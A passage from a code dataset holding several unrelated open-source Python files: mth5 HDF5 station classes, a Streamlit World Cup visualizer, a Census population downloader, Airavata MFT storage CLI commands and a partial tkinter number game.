'units':None,\n    >>> ... 'options':[],\n    >>> ... 'alias':[],\n    >>> ... 
'example':'new attribute\n\n To add a station:\n\n >>> new_station = stations.add_station('new_station')\n >>> stations\n /Survey/Stations:\n ====================\n --> Dataset: summary\n ......................\n |- Group: new_station\n ---------------------\n --> Dataset: summary\n ......................\n\n Add a station with metadata:\n\n >>> from mth5.metadata import Station\n >>> station_metadata = Station()\n >>> station_metadata.id = 'MT004'\n >>> station_metadata.time_period.start = '2020-01-01T12:30:00'\n >>> station_metadata.location.latitude = 40.000\n >>> station_metadata.location.longitude = -120.000\n >>> new_station = stations.add_station('Test_01', station_metadata)\n >>> # to look at the metadata\n >>> new_station.metadata\n {\n \"station\": {\n \"acquired_by.author\": null,\n \"acquired_by.comments\": null,\n \"id\": \"MT004\",\n ...\n }\n }\n\n\n .. seealso:: `mth5.metadata` for details on how to add metadata from\n various files and python objects.\n\n To remove a station:\n\n >>> stations.remove_station('new_station')\n >>> stations\n /Survey/Stations:\n ====================\n --> Dataset: summary\n ......................\n\n .. note:: Deleting a station is not as simple as del(station). In HDF5\n this does not free up memory, it simply removes the reference\n to that station. The common way to get around this is to\n copy what you want into a new file, or overwrite the station.\n\n To get a station:\n\n >>> existing_station = stations.get_station('existing_station_name')\n >>> existing_station\n /Survey/Stations/existing_station_name:\n =======================================\n --> Dataset: summary\n ......................\n |- Group: run_01\n ----------------\n --> Dataset: summary\n ......................\n --> Dataset: Ex\n ......................\n --> Dataset: Ey\n ......................\n --> Dataset: Hx\n ......................\n --> Dataset: Hy\n ......................\n --> Dataset: Hz\n ......................\n\n A summary table is provided to make searching easier. The table\n summarized all stations within a survey. 
To see what names are in the\n summary table:\n\n >>> stations.station_summary\n\n \"\"\"\n\n def __init__(self, group, **kwargs):\n\n super().__init__(group, **kwargs)\n\n @property\n def station_summary(self):\n \"\"\"\n Summary of stations in the file\n\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n st_list = []\n for key, group in self.hdf5_group.items():\n entry = {\n \"station\": key,\n \"start\": group.attrs[\"time_period.start\"],\n \"end\": group.attrs[\"time_period.end\"],\n \"latitude\": group.attrs[\"location.latitude\"],\n \"longitude\": group.attrs[\"location.longitude\"],\n }\n st_list.append(entry)\n\n df = pd.DataFrame(st_list)\n df.start = pd.to_datetime(df.start)\n df.end = pd.to_datetime(df.end)\n\n return df\n\n def add_station(self, station_name, station_metadata=None):\n \"\"\"\n Add a station with metadata if given with the path:\n ``/Survey/Stations/station_name``\n\n If the station already exists, will return that station and nothing\n is added.\n\n :param station_name: Name of the station, should be the same as\n metadata.id\n :type station_name: string\n :param station_metadata: Station metadata container, defaults to None\n :type station_metadata: :class:`mth5.metadata.Station`, optional\n :return: A convenience class for the added station\n :rtype: :class:`mth5_groups.StationGroup`\n\n :Example: ::\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> # one option\n >>> stations = mth5_obj.stations_group\n >>> new_station = stations.add_station('MT001')\n >>> # another option\n >>> new_staiton = mth5_obj.stations_group.add_station('MT001')\n\n .. todo:: allow dictionaries, json string, xml elements as metadata\n input.\n\n \"\"\"\n if station_name is None:\n raise Exception(\n \"station name is None, do not know what to name it\"\n )\n\n return self._add_group(\n station_name, StationGroup, station_metadata, match=\"id\"\n )\n\n def get_station(self, station_name):\n \"\"\"\n Get a station with the same name as station_name\n\n :param station_name: existing station name\n :type station_name: string\n :return: convenience station class\n :rtype: :class:`mth5.mth5_groups.StationGroup`\n :raises MTH5Error: if the station name is not found.\n\n :Example:\n\n >>> from mth5 import mth5\n >>> mth5_obj = mth5.MTH5()\n >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n >>> # one option\n >>> stations = mth5_obj.stations_group\n >>> existing_station = stations.get_station('MT001')\n >>> # another option\n >>> existing_staiton = mth5_obj.stations_group.get_station('MT001')\n MTH5Error: MT001 does not exist, check station_list for existing names\n\n \"\"\"\n return self._get_group(station_name, StationGroup)\n\n def remove_station(self, station_name):\n \"\"\"\n Remove a station from the file.\n\n .. note:: Deleting a station is not as simple as del(station). In HDF5\n this does not free up memory, it simply removes the reference\n to that station. 
The common way to get around this is to\n                  copy what you want into a new file, or overwrite the station.\n\n        :param station_name: existing station name\n        :type station_name: string\n\n        :Example: ::\n\n            >>> from mth5 import mth5\n            >>> mth5_obj = mth5.MTH5()\n            >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n            >>> # one option\n            >>> stations = mth5_obj.stations_group\n            >>> stations.remove_station('MT001')\n            >>> # another option\n            >>> mth5_obj.stations_group.remove_station('MT001')\n\n        \"\"\"\n\n        self._remove_group(station_name)\n\n\n# =============================================================================\n# Station Group\n# =============================================================================\nclass StationGroup(BaseGroup):\n    \"\"\"\n    StationGroup is a utility class to hold information about a single station\n    and accompanying metadata. This class is the next level down from\n    Stations --> ``/Survey/Stations/station_name``.\n\n    This class provides methods to add and get runs. A summary table of all\n    existing runs in the station is also provided as a convenience look up\n    table to make searching easier.\n\n    :param group: HDF5 group for a station, should have a path\n                  ``/Survey/Stations/station_name``\n    :type group: :class:`h5py.Group`\n    :param station_metadata: metadata container, defaults to None\n    :type station_metadata: :class:`mth5.metadata.Station`, optional\n\n    :Usage:\n\n    :Access StationGroup from an open MTH5 file:\n\n    >>> from mth5 import mth5\n    >>> mth5_obj = mth5.MTH5()\n    >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n    >>> station = mth5_obj.stations_group.get_station('MT001')\n\n    :Check what runs exist:\n\n    >>> station.groups_list\n    ['MT001a', 'MT001b', 'MT001c', 'MT001d']\n\n    To access the hdf5 group directly use `StationGroup.hdf5_group`.\n\n    >>> station.hdf5_group.ref\n    <HDF5 Group Reference>\n\n    .. note:: All attributes should be input into the metadata object, that\n              way all input will be validated against the metadata standards.\n              If you change attributes in metadata object, you should run the\n              `SurveyGroup.write_metadata()` method. This is a temporary\n              solution, working on an automatic updater if metadata is changed.\n\n    >>> station.metadata.existing_attribute = 'update_existing_attribute'\n    >>> station.write_metadata()\n\n    If you want to add a new attribute this should be done using the\n    `metadata.add_base_attribute` method.\n\n    >>> station.metadata.add_base_attribute('new_attribute',\n    >>> ... 'new_attribute_value',\n    >>> ... {'type':str,\n    >>> ... 'required':True,\n    >>> ... 'style':'free form',\n    >>> ... 'description': 'new attribute desc.',\n    >>> ... 'units':None,\n    >>> ... 'options':[],\n    >>> ... 'alias':[],\n    >>> ... 
'example':'new attribute\n\n :To add a run:\n\n >>> new_run = stations.add_run('MT001e')\n >>> new_run\n /Survey/Stations/Test_01:\n =========================\n |- Group: MT001e\n -----------------\n --> Dataset: summary\n ......................\n --> Dataset: summary\n ......................\n\n :Add a run with metadata:\n\n >>> from mth5.metadata import Run\n >>> run_metadata = Run()\n >>> run_metadata.time_period.start = '2020-01-01T12:30:00'\n >>> run_metadata.time_period.end = '2020-01-03T16:30:00'\n >>> run_metadata.location.latitude = 40.000\n >>> run_metadata.location.longitude = -120.000\n >>> new_run = runs.add_run('Test_01', run_metadata)\n >>> # to look at the metadata\n >>> new_run.metadata\n {\n \"run\": {\n \"acquired_by.author\": \"new_user\",\n \"acquired_by.comments\": \"First time\",\n \"channels_recorded_auxiliary\": ['T'],\n ...\n }\n }\n\n\n .. seealso:: `mth5.metadata` for details on how to add metadata from\n various files and python objects.\n\n :Remove a run:\n\n >>> station.remove_run('new_run')\n >>> station\n /Survey/Stations/Test_01:\n =========================\n --> Dataset: summary\n ......................\n\n .. note:: Deleting a station is not as simple as del(station). In HDF5\n this does not free up memory, it simply removes the reference\n to that station. The common way to get around this is to\n copy what you want into a new file, or overwrite the station.\n\n :Get a run:\n\n >>> existing_run = stations.get_station('existing_run')\n >>> existing_run\n /Survey/Stations/MT001/MT001a:\n =======================================\n --> Dataset: summary\n ......................\n --> Dataset: Ex\n ......................\n --> Dataset: Ey\n ......................\n --> Dataset: Hx\n ......................\n --> Dataset: Hy\n ......................\n --> Dataset: Hz\n ......................\n\n :summary Table:\n\n A summary table is provided to make searching easier. The table\n summarized all stations within a survey. 
To see what names are in the\n        summary table:\n\n        >>> new_run.summary_table.dtype.descr\n        [('id', ('|S20', {'h5py_encoding': 'ascii'})),\n         ('start', ('|S32', {'h5py_encoding': 'ascii'})),\n         ('end', ('|S32', {'h5py_encoding': 'ascii'})),\n         ('components', ('|S100', {'h5py_encoding': 'ascii'})),\n         ('measurement_type', ('|S12', {'h5py_encoding': 'ascii'})),\n         ('sample_rate', '<f8'),\n         ('hdf5_reference', '|O')]\n\n        >>> station.summary_table\n        index | id | start | end | components | measurement_type | sample_rate |\n        hdf5_reference\n        --------------------------------------------------------------------------\n        -------------\n    \"\"\"\n\n    def __init__(self, group, station_metadata=None, **kwargs):\n        self._default_subgroup_names = [\n            \"Transfer_Functions\",\n            \"Fourier_Coefficients\",\n        ]\n        super().__init__(group, group_metadata=station_metadata, **kwargs)\n\n    def initialize_group(self, **kwargs):\n        \"\"\"\n        Initialize group by making a summary table and writing metadata\n\n        \"\"\"\n        for key, value in kwargs.items():\n            setattr(self, key, value)\n        self.write_metadata()\n\n        for group_name in self._default_subgroup_names:\n            self.hdf5_group.create_group(f\"{group_name}\")\n            m5_grp = getattr(self, f\"{group_name.lower()}_group\")\n            m5_grp.initialize_group()\n\n    @property\n    def master_station_group(self):\n        \"\"\"shortcut to master station group\"\"\"\n        return MasterStationGroup(self.hdf5_group.parent)\n\n    @property\n    def transfer_functions_group(self):\n        \"\"\"Convenience method for /Station/Transfer_Functions\"\"\"\n        return TransferFunctionsGroup(\n            self.hdf5_group[\"Transfer_Functions\"], **self.dataset_options\n        )\n\n    @property\n    def fourier_coefficients_group(self):\n        \"\"\"Convenience method for /Station/Fourier_Coefficients\"\"\"\n        return MasterFCGroup(\n            self.hdf5_group[\"Fourier_Coefficients\"], **self.dataset_options\n        )\n\n    @property\n    def survey_metadata(self):\n        \"\"\"survey metadata\"\"\"\n\n        meta_dict = dict(self.hdf5_group.parent.parent.attrs)\n        for key, value in meta_dict.items():\n            meta_dict[key] = from_numpy_type(value)\n        survey_metadata = metadata.Survey()\n        survey_metadata.from_dict({\"survey\": meta_dict})\n        survey_metadata.add_station(self.metadata)\n        return survey_metadata\n\n    @BaseGroup.metadata.getter\n    def metadata(self):\n        \"\"\"Overwrite get metadata to include run information in the station\"\"\"\n\n        if not self._has_read_metadata:\n            self.read_metadata()\n            self._has_read_metadata = True\n\n        for key in self.groups_list:\n            if key.lower() in [\n                name.lower() for name in self._default_subgroup_names\n            ]:\n                continue\n            try:\n                key_group = self.get_run(key)\n                self._metadata.add_run(key_group.metadata)\n            except MTH5Error:\n                self.logger.warning(f\"Could not find run {key}\")\n        return self._metadata\n\n    @property\n    def name(self):\n        return self.metadata.id\n\n    @name.setter\n    def name(self, name):\n        self.metadata.id = name
@property\n    def run_summary(self):\n        \"\"\"\n        Summary of runs in the station\n\n        :return: DESCRIPTION\n        :rtype: TYPE\n\n        \"\"\"\n\n        run_list = []\n        for key, group in self.hdf5_group.items():\n            if group.attrs[\"mth5_type\"].lower() in [\"run\"]:\n                comps = \",\".join(\n                    [\n                        ii.decode()\n                        for ii in group.attrs[\n                            \"channels_recorded_auxiliary\"\n                        ].tolist()\n                        + group.attrs[\"channels_recorded_electric\"].tolist()\n                        + group.attrs[\"channels_recorded_magnetic\"].tolist()\n                    ]\n                )\n                run_list.append(\n                    (\n                        group.attrs[\"id\"],\n                        group.attrs[\"time_period.start\"].split(\"+\")[0],\n                        group.attrs[\"time_period.end\"].split(\"+\")[0],\n                        comps,\n                        group.attrs[\"data_type\"],\n                        group.attrs[\"sample_rate\"],\n                        group.ref,\n                    )\n                )\n        run_summary = np.array(\n            run_list,\n            dtype=np.dtype(\n                [\n                    (\"id\", \"U20\"),\n                    (\"start\", \"datetime64[ns]\"),\n                    (\"end\", \"datetime64[ns]\"),\n                    (\"components\", \"U100\"),\n                    (\"measurement_type\", \"U12\"),\n                    (\"sample_rate\", float),\n                    (\"hdf5_reference\", h5py.ref_dtype),\n                ]\n            ),\n        )\n\n        return pd.DataFrame(run_summary)\n\n    def make_run_name(self, alphabet=False):\n        \"\"\"\n        Make a run name that will be the next alphabet letter extracted from\n        the run list.  Expects that all runs are labeled as id{a-z}.\n\n        :return: metadata.id + next letter\n        :rtype: string\n\n        >>> station.metadata.id = 'MT001'\n        >>> station.make_run_name()\n        'MT001a'\n\n        \"\"\"\n\n        run_list = sorted(\n            [group[-1:] for group in self.groups_list if self.name in group]\n        )\n\n        next_letter = None\n        if len(run_list) == 0:\n            if alphabet:\n                next_letter = \"a\"\n            else:\n                next_letter = \"001\"\n        else:\n            try:\n                next_letter = chr(ord(run_list[-1]) + 1)\n            except TypeError:\n                try:\n                    next_letter = f\"{int(run_list[-1]) + 1}\"\n                except ValueError:\n                    self.logger.info(\"Could not create a new run name\")\n        return next_letter\n\n    def locate_run(self, sample_rate, start):\n        \"\"\"\n        Locate a run based on sample rate and start time from the summary table\n\n        :param sample_rate: sample rate in samples/seconds\n        :type sample_rate: float\n        :param start: start time\n        :type start: string or :class:`mth5.utils.mttime.MTime`\n        :return: matching rows from the run summary, None if not found\n        :rtype: :class:`pandas.DataFrame` or None\n\n        \"\"\"\n\n        if not isinstance(start, MTime):\n            start = MTime(start)\n\n        run_summary = self.run_summary.copy()\n        if run_summary.size < 1:\n            return None\n        sr_find = run_summary[\n            (run_summary.sample_rate == sample_rate)\n            & (run_summary.start == start)\n        ]\n        if sr_find.size < 1:\n            return None\n        return sr_find\n\n    def add_run(self, run_name, run_metadata=None):\n        \"\"\"\n        Add a run to a station.\n\n        :param run_name: run name, should be id{a-z}\n        :type run_name: string\n        :param run_metadata: metadata container, defaults to None\n        :type run_metadata: :class:`mth5.metadata.Run`, optional\n\n        need to be able to fill an entry in the summary table.\n\n        .. todo:: auto fill run name if none is given.\n\n        .. todo:: add ability to add a run with data.\n\n        \"\"\"\n\n        return self._add_group(\n            run_name, RunGroup, group_metadata=run_metadata, match=\"id\"\n        )\n\n    def get_run(self, run_name):\n        \"\"\"\n        get a run from run name\n\n        :param run_name: existing run name\n        :type run_name: string\n        :return: Run object\n        :rtype: :class:`mth5.mth5_groups.RunGroup`\n\n        >>> existing_run = station.get_run('MT001a')\n\n        \"\"\"\n\n        return self._get_group(run_name, RunGroup)
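The `run_summary` property in the mth5 record above builds a typed NumPy structured array from HDF5 group attributes and wraps it in a DataFrame, so that lookups like `locate_run` become simple boolean filters. A minimal, self-contained sketch of the same pattern follows; the run entries here are made-up values, not real mth5 output:

```python
import numpy as np
import pandas as pd

# hypothetical run entries mirroring the (id, start, end, sample_rate) columns
rows = [
    ("MT001a", "2020-01-01T00:00:00", "2020-01-02T00:00:00", 256.0),
    ("MT001b", "2020-01-03T00:00:00", "2020-01-04T00:00:00", 4096.0),
]

# a typed structured array keeps datetimes and floats directly searchable
summary = np.array(
    rows,
    dtype=np.dtype(
        [
            ("id", "U20"),
            ("start", "datetime64[ns]"),
            ("end", "datetime64[ns]"),
            ("sample_rate", float),
        ]
    ),
)
df = pd.DataFrame(summary)

# locate_run-style lookup: a boolean filter on sample rate and start time
match = df[(df.sample_rate == 256.0) & (df.start == pd.Timestamp("2020-01-01"))]
print(match if match.size else None)
```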
def remove_run(self, run_name):\n        \"\"\"\n        Remove a run from the station.\n\n        .. note:: Deleting a run is not as simple as del(run).  In HDF5\n              this does not free up memory, it simply removes the reference\n              to that run.  The common way to get around this is to\n              copy what you want into a new file, or overwrite the run.\n\n        :param run_name: existing run name\n        :type run_name: string\n\n        :Example: ::\n\n            >>> from mth5 import mth5\n            >>> mth5_obj = mth5.MTH5()\n            >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n            >>> station = mth5_obj.stations_group.get_station('MT001')\n            >>> station.remove_run('MT001a')\n\n        \"\"\"\n\n        self._remove_group(run_name)\n\n    def update_station_metadata(self):\n        \"\"\"\n        Check metadata from the runs and make sure it matches the station metadata\n\n        :return: DESCRIPTION\n        :rtype: TYPE\n\n        \"\"\"\n\n        run_summary = self.run_summary.copy()\n        self._metadata.time_period.start = run_summary.start.min().isoformat()\n        self._metadata.time_period.end = run_summary.end.max().isoformat()\n        self._metadata.channels_recorded = list(\n            set(\",\".join(run_summary.components.to_list()).split(\",\"))\n        )\n\n        self.write_metadata()\n","repo_name":"kujaku11/mth5","sub_path":"mth5/groups/station.py","file_name":"station.py","file_ext":"py","file_size_in_byte":23622,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"}
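The docstrings in the mth5 record above repeatedly warn that deleting an HDF5 group only removes the reference and does not shrink the file. A small h5py sketch of the copy-to-a-new-file workaround they describe (file names are arbitrary):

```python
import os
import h5py
import numpy as np

# write two datasets, then delete one
with h5py.File("demo.h5", "w") as f:
    f.create_dataset("keep", data=np.zeros(100_000))
    f.create_dataset("drop", data=np.zeros(100_000))
with h5py.File("demo.h5", "a") as f:
    del f["drop"]  # unlinks the name, but the storage stays allocated
print("after delete:", os.path.getsize("demo.h5"))

# workaround: copy the surviving objects into a fresh file
with h5py.File("demo.h5", "r") as src, h5py.File("demo_packed.h5", "w") as dst:
    for name in src:
        src.copy(name, dst)
print("repacked:  ", os.path.getsize("demo_packed.h5"))
```

The HDF5 tools distribution also ships `h5repack` for the same purpose.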
+{"seq_id":"19724940069","text":"import streamlit as st\r\nimport pandas as pd\r\nimport altair as alt\r\n\r\n# Load the data from a CSV file\r\ndata = pd.read_csv('fifa_world_cup_data.csv')\r\n\r\n# Create a table with the desired columns\r\ntable = data[['Year', 'Winner', 'Host', 'Highest Goal Scorer']]\r\n\r\n# Set the table headers\r\ntable.columns = ['Year', 'Winner', 'Host', 'Highest Goal Scorer']\r\n\r\n# Home Page\r\nst.set_page_config(page_title='FIFA World Cup Visualizer', page_icon=':soccer:', layout='wide')\r\nst.title('FIFA World Cup Visualizer')\r\nst.write('Welcome to the FIFA World Cup Visualizer! This app provides an interactive way to explore World Cup data. Use the sidebar to select different visualizations.')\r\nst.write('🌎🏆🥇🥅')\r\n\r\n# Sidebar\r\nst.sidebar.title('Visualizations')\r\noptions = ['World Cup Winners', 'Wins by Country', 'Wins by Host', 'Highest Goal Scorer by Year']\r\nchoice = st.sidebar.selectbox('Select a visualization', options)\r\n\r\n\r\n# Display the selected visualization\r\nif choice == 'World Cup Winners':\r\n    st.header('🏆 FIFA World Cup Winners 🏆')\r\n    st.write('This table shows the winners of the FIFA World Cup, along with the host country, highest goal scorer, and the year in which the tournament was held.')\r\n    st.table(table)\r\nelif choice == 'Wins by Country':\r\n    # Create a bar chart showing the number of times each country has won the World Cup\r\n    winners = data['Winner'].value_counts().rename_axis('country').reset_index(name='num_wins')\r\n    chart1 = alt.Chart(winners).mark_bar().encode(\r\n        x='country:N',\r\n        y='num_wins:Q'\r\n    )\r\n    chart1 = chart1.properties(title='Number of World Cup wins by country')\r\n    st.header('🏆 Number of World Cup wins by country 🌎')\r\n    st.write('This bar chart shows the number of times each country has won the FIFA World Cup.')\r\n    st.altair_chart(chart1, use_container_width=True)\r\nelif choice == 'Wins by Host':\r\n    # Create a pie chart showing the number of times each country has hosted the World Cup\r\n    hosts = data['Host'].value_counts().rename_axis('host').reset_index(name='num_hosts')\r\n    chart2 = alt.Chart(hosts).mark_arc().encode(\r\n        theta='num_hosts:Q',\r\n        color=alt.Color('host:N', legend=None),\r\n        tooltip=['host', 'num_hosts']\r\n    ).properties(\r\n        width=400,\r\n        height=400,\r\n        title='Number of World Cup hosts by country'\r\n    )\r\n    st.header('🌎 Number of World Cup hosts by country 🏆')\r\n    st.write('This pie chart shows the number of times each country has hosted the FIFA World Cup.')\r\n    st.altair_chart(chart2, use_container_width=True)\r\nelif choice == 'Highest Goal Scorer by Year':\r\n    # Create a scatter chart showing the relationship between highest goal scorer and year\r\n    scatter_data = data[['Year', 'Highest Goal Scorer']]\r\n    scatter_data.columns = ['Year', 'Highest Goal Scorer']\r\n    chart3 = alt.Chart(scatter_data).mark_circle().encode(\r\n        x='Year:N',\r\n        y='Highest Goal Scorer:N',\r\n        size=alt.Size('count():Q', legend=None),\r\n        color=alt.Color('Year:N', legend=None),\r\n        tooltip=['Year', 'Highest Goal Scorer', 'count()']\r\n    ).properties(\r\n        width=600,\r\n        height=400,\r\n        title='Highest goal scorer by year'\r\n    )\r\n    st.header('🥅 Highest goal scorer by year 📅')\r\n    st.write('This scatter chart shows the relationship between the highest goal scorer and the year in which the tournament was held.')\r\n    st.altair_chart(chart3, use_container_width=True)\r\n","repo_name":"cloudtechhills/world_cup_visualiser","sub_path":"football-visualiser.py","file_name":"football-visualiser.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21187934271","text":"import requests\nimport pandas as pd\nimport json\n\n# input start and end years to get the data from API\nstart_year = 2015\nend_year = 2019\n\n# define path for output file of population data\noutput_path = 'data/cleaned/data_pop_' + str(start_year) + '_' + str(end_year) + '.csv'\n\n# define path to get the mapping CSV files\nmapping_agegroup_path = 'data/cleaned/mapping/mapping_pop_agegroup.csv'\nmapping_race_path = 
'data/cleaned/mapping/mapping_pop_race.csv'\nmapping_state_path = 'data/cleaned/mapping/mapping_pop_state.csv'\n\n\ndef get_data(start_year, end_year):\n df_output = pd.DataFrame(columns=['pop', 'agegroup_code', 'race_code', 'sex_code', 'state_code', 'year'])\n for year in range(start_year, end_year + 1):\n # GET request\n url = 'https://api.census.gov/data/' + str(year) + '/pep/charagegroups?get=POP,AGEGROUP,RACE,SEX&for=state:*'\n res = requests.get(url)\n\n # read response to pandas dataframe\n df = pd.DataFrame(json.loads(res.text)[1:], columns=['pop', 'agegroup_code', 'race_code', 'sex_code', 'state_code'])\n df = df.astype(float).round().astype(int) # change datatype to int, found some anomalies where num population is float\n df['year'] = year # add year column\n\n df_output = df_output.append(df, ignore_index=True)\n\n return df_output\n\n\ndef filter_data(df_output):\n df_filtered = df_output[(df_output.agegroup_code >= 1) & (df_output.agegroup_code <= 18) & \\\n (df_output.race_code >= 1) & (df_output.race_code <= 6) & \\\n (df_output.sex_code != 0)]\n return df_filtered\n\n\ndef map_data(df_filtered):\n df_mapping_agegroup = pd.read_csv(mapping_agegroup_path)\n df_mapping_race = pd.read_csv(mapping_race_path)\n df_mapping_state = pd.read_csv(mapping_state_path)\n\n df_mapped = df_filtered.merge(df_mapping_agegroup, how='left', left_on='agegroup_code', right_on='age_group_code')\n df_mapped = df_mapped.merge(df_mapping_race, how='left', on='race_code')\n df_mapped = df_mapped.merge(df_mapping_state, how='left', on='state_code')\n df_mapped['sex'] = df_mapped['sex_code'].map({1:'M', 2:'F'})\n\n df_mapped = df_mapped[['year', 'agegroup_code', 'min_age', 'max_age', 'average_age', 'race_code',\\\n 'race', 'state_code', 'state', 'postal_abbr', 'sex_code', 'sex', 'pop']]\n\n return df_mapped\n\n\ndef write_to_csv(df, path):\n df.to_csv(path, index=False)\n\n\nif __name__ == '__main__':\n # get population data for the specified years from API and output as pandas df\n df_output = get_data(start_year, end_year)\n # filter data so that it doesn't contain any duplicates > age group, race, sex\n df_filtered = filter_data(df_output)\n # map columns (age group, race, state) with the mapping read from CSV\n df_mapped = map_data(df_filtered)\n # write output files\n write_to_csv(df_mapped, output_path)\n\n\n\n\n","repo_name":"bvorapoom/usc_apds","sub_path":"551_Data Management/Project/downloadPopData.py","file_name":"downloadPopData.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10469621161","text":"import typer\nfrom pick import pick\nimport airavata_mft_cli.storage.s3 as s3\nimport airavata_mft_cli.storage.scp as scp\nimport airavata_mft_cli.storage.azure as azure\nimport airavata_mft_cli.storage.gcs as gcs\nimport airavata_mft_cli.storage.local as local\nimport airavata_mft_cli.storage.swift as swift\nimport airavata_mft_cli.storage.http as http\nfrom airavata_mft_sdk import mft_client\nfrom airavata_mft_sdk.common import StorageCommon_pb2\nfrom rich.console import Console\nfrom rich.table import Table\nfrom rich import print\nimport sys\nsys.path.append('../airavata_mft_cli')\nfrom airavata_mft_cli import config as configcli\nfrom airavata_mft_cli.util import exception_handler\n\napp = typer.Typer(pretty_exceptions_show_locals=True)\n\n@app.command(\"add\")\ndef add_storage():\n try:\n title = \"Select storage type: \"\n options = [\"S3\", \"Google Cloud Storage (GCS)\", \"Azure 
Storage\", \"Openstack SWIFT\", \"SCP\", \"FTP\", \"Box\", \"DropBox\", \"OData\", \"Agent\", \"HTTP\" ]\n option, index = pick(options, title, indicator=\"=>\")\n if option == \"S3\":\n s3.handle_add_storage()\n elif option == \"Azure Storage\":\n azure.handle_add_storage()\n elif option == \"Google Cloud Storage (GCS)\":\n gcs.handle_add_storage()\n elif option == \"Agent\":\n local.handle_add_storage()\n elif option == \"Openstack SWIFT\":\n swift.handle_add_storage()\n elif option == \"SCP\":\n scp.handle_add_storage()\n elif option == \"HTTP\":\n http.handle_add_storage()\n except Exception as e:\n exception_handler(e)\n\n@app.command(\"remove\")\ndef remove_storage(storage_id):\n client = mft_client.MFTClient(transfer_api_port = configcli.transfer_api_port,\n transfer_api_secured = configcli.transfer_api_secured,\n resource_service_host = configcli.resource_service_host,\n resource_service_port = configcli.resource_service_port,\n resource_service_secured = configcli.resource_service_secured,\n secret_service_host = configcli.secret_service_host,\n secret_service_port = configcli.secret_service_port)\n delete_request = StorageCommon_pb2.SecretForStorageDeleteRequest(storageId=storage_id)\n delete_response = client.common_api.deleteSecretsForStorage(delete_request)\n console = Console()\n console.print(\"Storage removed: \" + str(delete_response.status))\n\n@app.command(\"list\")\ndef list_storage():\n try:\n client = mft_client.MFTClient(transfer_api_port = configcli.transfer_api_port,\n transfer_api_secured = configcli.transfer_api_secured,\n resource_service_host = configcli.resource_service_host,\n resource_service_port = configcli.resource_service_port,\n resource_service_secured = configcli.resource_service_secured,\n secret_service_host = configcli.secret_service_host,\n secret_service_port = configcli.secret_service_port)\n list_req = StorageCommon_pb2.StorageListRequest()\n list_response = client.common_api.listStorages(list_req)\n\n console = Console()\n table = Table(show_header=True, header_style='bold #2070b2')\n\n table.add_column('Storage Name', justify='left')\n table.add_column('Type', justify='center')\n table.add_column('Storage ID', justify='center')\n\n for storage in list_response.storageList:\n\n table.add_row('[bold]' + storage.storageName + '[/bold]',\n StorageCommon_pb2.StorageType.Name(storage.storageType),\n storage.storageId)\n\n console.print(table)\n except Exception as e:\n exception_handler(e)","repo_name":"apache/airavata-mft","sub_path":"python-cli/mft_cli/airavata_mft_cli/storage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4000,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"9129234552","text":"\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nimport random\r\nimport numpy as np\r\n\r\n\r\n# Colours of each button on the basis of number on it\r\nBACKGROUND_COLOR_CELLS = {1: \"#f5f5f5\", 2: \"#e0f2f8\", 3: \"#b8dbe5\",\r\n 4: \"#71b1bd\", 5: \"#27819f\", 6: \"#0073b9\",\r\n 7: \"#7fa8d7\", 8: \"#615ea6\", 9: \"#2f3490\",\r\n 10: \"#1c1691\"}\r\n\r\n\r\nclass Grid_num(Frame):\r\n\r\n def __init__(self):\r\n Frame.__init__(self)\r\n self.grid()\r\n self.master.title('Check Number')\r\n self.l = list(range(1,11))\r\n \r\n self.grid_cells = []\r\n self.background = Frame(self, bg=\"#72549d\",width=600, height=400,padx=400,pady=200)\r\n self.rootframe = tk.Frame(self,width=200, height=200,padx=200,pady=200)\r\n\r\n self.buttonframe = tk.Frame(self)\r\n 
self.buttonframe.grid(row=1, column=0, columnspan=1)\r\n        self.background.grid()\r\n        self.start()\r\n        self.rnum=0\r\n        self.list_comb=[]\r\n        self.sub=[]\r\n        self.gindex=[]\r\n        self.allinone=[]\r\n\r\n    def tileselect(self,event):\r\n        \"\"\"Selection of tiles on the basis of random number\"\"\"\r\n        x=event.widget._coords[0]\r\n        y=event.widget._coords[1]\r\n        \r\n        # check whether the element was already selected in this round\r\n        if self.matrix[x][y] not in self.list_comb: \r\n            if self.matrix[x][y]==self.rnum:\r\n                self.list_comb.append(self.matrix[x][y])\r\n                self.matrix[x][y]=0\r\n                self.grid_cells[x][y].configure(text=\" \", bg=\"red\")\r\n                self.score+=1\r\n                self.scorel.config(text = \"SCORE: \"+str(self.score))\r\n\r\n            else:\r\n                \r\n                # check the last two selected elements and whether their sum matches\r\n                self.sub.append(self.matrix[x][y])\r\n                self.gindex.append([x,y])\r\n                len_sub=len(self.sub)\r\n                len_ind=len(self.gindex)\r\n\r\n                if len_sub==1:\r\n                    print(\" \")\r\n                    \r\n                elif (self.sub[len_sub-1]+self.sub[len_sub-2])==self.rnum:\r\n                    self.list_comb.append(self.sub[len_sub-1])\r\n                    self.list_comb.append(self.sub[len_sub-2])\r\n                    self.score+=2\r\n                    self.scorel.config(text = \"SCORE: \"+str(self.score))\r\n\r\n                    x1=self.gindex[len(self.gindex)-1][0]\r\n                    y1=self.gindex[len(self.gindex)-1][1]\r\n                    x2=self.gindex[len(self.gindex)-2][0]\r\n                    y2=self.gindex[len(self.gindex)-2][1]\r\n                    self.matrix[x1][y1]=0\r\n                    self.matrix[x2][y2]=0\r\n                    self.grid_cells[x1][y1].configure(text=\" \", bg=\"red\")\r\n                    self.grid_cells[x2][y2].configure(text=\" \", bg=\"red\")\r\n                    \r\n                    \r\n                else:\r\n                    print(\"\")\r\n        self.allinone.append(self.list_comb)       \r\n            \r\n    def init_grid(self):\r\n        self.grid_cells = []\r\n        self.background = Frame(self, 